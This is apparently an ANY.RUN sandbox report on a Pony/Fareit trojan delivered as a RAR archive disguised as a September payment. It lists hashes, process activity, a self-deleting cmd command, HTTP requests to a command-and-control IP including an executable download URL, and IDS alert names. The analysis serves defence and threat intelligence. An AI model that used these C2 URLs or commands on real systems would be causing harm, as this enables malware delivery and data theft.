analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Оплата за сентябрь.001

Full analysis: https://app.any.run/tasks/e8e64bc0-60db-419e-afc3-c08e403eb670
Verdict: Malicious activity
Threats:

Pony is a malware with two main functions — stealing information and dropping other viruses with different tasks on infected machines. It has been around since 2011, and it still actively attacks users in Europe and America.

Analysis date: September 19, 2019, 06:26:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
pony
fareit
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

CB2834BE49E807798BB576D2BC772456

SHA1:

928B035E07B0B25BD8246A1DED6415479E0D6206

SHA256:

F9D4E81152DA11CBA77D38B594B4F930B88FECF7FDA71D8DA94E3662FA7638F0

SSDEEP:

1536:lLDR8fRZcEKeXabr2K0RiUWZeEISRU1ka1XA0mGAfZ:ZR8fncEEbJrnZeEISRU1vrTAR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Оплата за сентябрь.exe (PID: 2684)
      • Оплата за сентябрь.exe (PID: 3276)
    • Downloads executable files from IP

      • Оплата за сентябрь.exe (PID: 3276)
    • Connects to CnC server

      • Оплата за сентябрь.exe (PID: 3276)
    • Detected Pony/Fareit Trojan

      • Оплата за сентябрь.exe (PID: 3276)
    • Downloads executable files from the Internet

      • Оплата за сентябрь.exe (PID: 3276)
    • Actions looks like stealing of personal data

      • Оплата за сентябрь.exe (PID: 3276)
  • SUSPICIOUS

    • Starts CMD.EXE for self-deleting

      • Оплата за сентябрь.exe (PID: 3276)
    • Application launched itself

      • Оплата за сентябрь.exe (PID: 2684)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 2724)
    • Connects to server without host name

      • Оплата за сентябрь.exe (PID: 3276)
    • Searches for installed software

      • Оплата за сентябрь.exe (PID: 3276)
    • Starts CMD.EXE for commands execution

      • Оплата за сентябрь.exe (PID: 3276)
  • INFO

    • Application was crashed

      • Оплата за сентябрь.exe (PID: 3276)
      • Оплата за сентябрь.exe (PID: 2684)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
5
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start start winrar.exe оплата за сентябрь.exe #PONY оплата за сентябрь.exe cmd.exe no specs ping.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2724"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Оплата за сентябрь.001.rar"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2684"C:\Users\admin\AppData\Local\Temp\Rar$EXa2724.40007\Оплата за сентябрь.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa2724.40007\Оплата за сентябрь.exe
WinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221225477
3276"C:\Users\admin\AppData\Local\Temp\Rar$EXa2724.40007\Оплата за сентябрь.exe" dfsrC:\Users\admin\AppData\Local\Temp\Rar$EXa2724.40007\Оплата за сентябрь.exe
Оплата за сентябрь.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221225477
3868cmd.exe /c ping 127.0.0.1 & del /F /Q "C:\Users\admin\AppData\Local\Temp\Rar$EXa2724.40007\Оплата за сентябрь.exe"C:\Windows\system32\cmd.exeОплата за сентябрь.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2772ping 127.0.0.1 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
533
Read events
490
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
2724WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2724.40007\Оплата за сентябрь.exeexecutable
MD5:97092BEC12FB5938C70229BA2708E3E4
SHA256:42B937924371D2FFB1168F5A739A86BF1A4820BD24DA79B0B8B34D133B88CA74
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
9
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3276
Оплата за сентябрь.exe
POST
172.105.69.5:80
http://172.105.69.5/g_38472341.php
US
malicious
3276
Оплата за сентябрь.exe
GET
200
172.105.69.5:80
http://172.105.69.5/index.php?id=0&un=61646d696e&cn=555345522d5043
US
executable
97.0 Kb
malicious
3276
Оплата за сентябрь.exe
POST
172.105.69.5:80
http://172.105.69.5/g_38472341.php
US
malicious
3276
Оплата за сентябрь.exe
POST
172.105.69.5:80
http://172.105.69.5/g_38472341.php
US
malicious
3276
Оплата за сентябрь.exe
GET
200
172.105.69.5:80
http://172.105.69.5/index.php?id=0&un=61646d696e&cn=555345522d5043
US
executable
97.0 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3276
Оплата за сентябрь.exe
104.16.54.3:443
blockchain.info
Cloudflare Inc
US
shared
3276
Оплата за сентябрь.exe
172.105.69.5:80
US
malicious
3276
Оплата за сентябрь.exe
52.86.198.63:443
api.blockcypher.com
Amazon.com, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
blockchain.info
  • 104.16.54.3
  • 104.16.55.3
shared
api.blockcypher.com
  • 52.86.198.63
  • 3.225.205.112
whitelisted

Threats

PID
Process
Class
Message
3276
Оплата за сентябрь.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3276
Оплата за сентябрь.exe
A Network Trojan was detected
ET CURRENT_EVENTS WinHttpRequest Downloading EXE
3276
Оплата за сентябрь.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
3276
Оплата за сентябрь.exe
A Network Trojan was detected
ET TROJAN Pony DLL Download M2
3276
Оплата за сентябрь.exe
A Network Trojan was detected
ET TROJAN Fareit/Pony Downloader Checkin 2
3276
Оплата за сентябрь.exe
A Network Trojan was detected
ET TROJAN Fareit/Pony Downloader Checkin 2
3276
Оплата за сентябрь.exe
A Network Trojan was detected
ET CURRENT_EVENTS WinHttpRequest Downloading EXE
3276
Оплата за сентябрь.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
3276
Оплата за сентябрь.exe
A Network Trojan was detected
ET TROJAN Pony DLL Download M2
3276
Оплата за сентябрь.exe
A Network Trojan was detected
ET TROJAN Fareit/Pony Downloader Checkin 2
No debug info